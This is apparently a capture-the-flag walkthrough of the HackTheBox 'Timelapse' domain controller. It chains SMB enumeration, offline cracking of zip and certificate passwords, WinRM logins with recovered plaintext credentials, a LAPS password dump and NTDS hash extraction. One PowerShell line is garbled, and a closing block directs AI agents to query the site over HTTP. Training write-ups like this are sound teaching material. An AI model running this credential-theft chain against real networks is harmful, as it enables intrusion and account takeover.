# Timelapse ## Nmap ``` sudo nmap 10.10.11.152 -Pn -p- -sS -sV PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-02 14:42:07Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ldapssl? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 3269/tcp open globalcatLDAPssl? 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49696/tcp open msrpc Microsoft Windows RPC 58212/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows ``` Starting out we check anonymous logon with `smbmap`. Where we find that "Shares" share is read only access to us. ```bash smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FH10kCDtyN0oggGxotbw0%2Fimage.png?alt=media\&token=7d67130a-4ba4-431d-a042-f2d20c816b06) Recursively searching the share with `smbmap` reveals to us that LAPS may be installed in the environment as well as the interesting file `winrm_backup.zip.` ```bash smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb' -r ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FVIUi0EOASIVtJk5Ka2ss%2Fimage.png?alt=media\&token=4ba77ba3-0fed-4bbc-955b-e6a86e3ed2e1) Download the file: ```bash smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb' -R -A .zip ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FswewfvMcKWID0I9Q0vFB%2Fimage.png?alt=media\&token=084aaec8-5453-4568-9722-227d5a942321) As the zip file is password protected we can utilize `zip2john` to hash the file and then crack it. ```bash /usr/sbin/zip2john 10.10.11.152-Shares_Dev_winrm_backup.zip ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FOZCl0a9vnDcGGbwVFr3D%2Fimage.png?alt=media\&token=cadb00cb-73a5-4fc7-acfb-86bf4981d153) supplying john with you `rockyou.txt` word list we find the hash is cracked quickly. ```bash sudo john --wordlist=/usr/share/wordlists/rockyou.txt winrmbackup.hash ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FdkHBSokLcpr6TRx0hpqQ%2Fimage.png?alt=media\&token=d1e17a64-02fb-404f-9329-88d2e70380e8) We are left with the file `legaccy_dev_auth.pfx`. A .pfx file is a certificate in PKCS#12 format. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FM1hw9qXtGN1XPAXG1S5e%2Fimage.png?alt=media\&token=54f64450-2628-459d-a779-9466c205827e) Again, we need to hash the `.pfx` file and crack the password. ```bash /usr/bin/pfx2john legacyy_dev_auth.pfx >> pfx.hash ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FtihvyosBOd7w92N7V9Mq%2Fimage.png?alt=media\&token=e49243ee-4d83-45d5-96c0-0ac53a950a95) With the .pfx file we can now look at how we can connect to the target system. It is possible to connect over WinRM by providing a public certificate and a valid private key both of which can be extracted from .pfx files. I used the following link for guidance on how to extract this information: **URL:** ```bash # Extract the private key openssl pkcs12 -in [yourfile.pfx] -nocerts -out [drlive.key] # Extract the certificate openssl pkcs12 -in [yourfile.pfx] -clcerts -nokeys -out [drlive.crt] # Decrypt the private key openssl rsa -in [drlive.key] -out [drlive-decrypted.key] ``` **Note:** You may need to connect to a TCP OpenVPN configuration for the following to connect successfully. ```bash evil-winrm -i '10.10.11.152' -c 'drlive.crt' -k 'drlive-decrypted.key' -S -r 'timelapse.htb' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FtcPb7OCASHB89PGa0JeI%2Fimage.png?alt=media\&token=b7d5f5ae-4ca7-4528-aaac-43b86655ba39) ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F7jOWgeXePVadUiQZBnFs%2Fimage.png?alt=media\&token=3687f3de-972d-4588-91d0-6c1a368a73a7) From here we look into the `ConsoleHost_History.txt` file and find credential information contained within. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNhCO2XrWi7terrg2Zy6m%2Fimage.png?alt=media\&token=d0492547-cbce-4a1c-bdba-cf128ac6b467) We now have the credentials for `svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV` ```bash evil-winrm -i '10.10.11.152' -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S -P 5986 ``` Viewing the group memberships for our current user we see we are a member of "LAPS Readers". ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FiU5kV3htDZX7tcSwssh3%2Fimage.png?alt=media\&token=adaa93cd-1202-4db0-bb2e-c02ad65cd348) Knowing this we can run the following `b` command to pull the local administrator password for the host DC01. ```powershell Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd' | Where-Objee $null } | Select-Object 'Name','ms-Mcs-AdmPwd' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F1y6oRsosdJ160Rqz6uSp%2Fimage.png?alt=media\&token=180f4fb1-64c6-48a6-9128-0c713a3946fe) We are then able to use `Evil-WinRM` to authenticate against the target system with the LAPS password. ```bash evil-winrm -i '10.10.11.152' -u 'administrator' -p '+K)HlT72oO(W6;W&402qD9LS' -S -P 5986 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fthl5RsXrkqiIL6UwvvRy%2Fimage.png?alt=media\&token=38a077dd-1efe-4f47-876f-4935636b2b9f) Then grab the **root** flag. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FLxOUHwaSTQYlvgbvuFAo%2Fimage.png?alt=media\&token=48a013a8-753a-4674-acef-1536379f5582) `Crackmapexec` has also been utilized with the credentials to dump the `NTDS.dit` hashes from the target system. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FguwpDTXRNraMzG9GV6QD%2Fimage.png?alt=media\&token=dece1079-2ca2-4c7b-836d-37231dca4010) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/hackthebox/windows-machines/timelapse.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.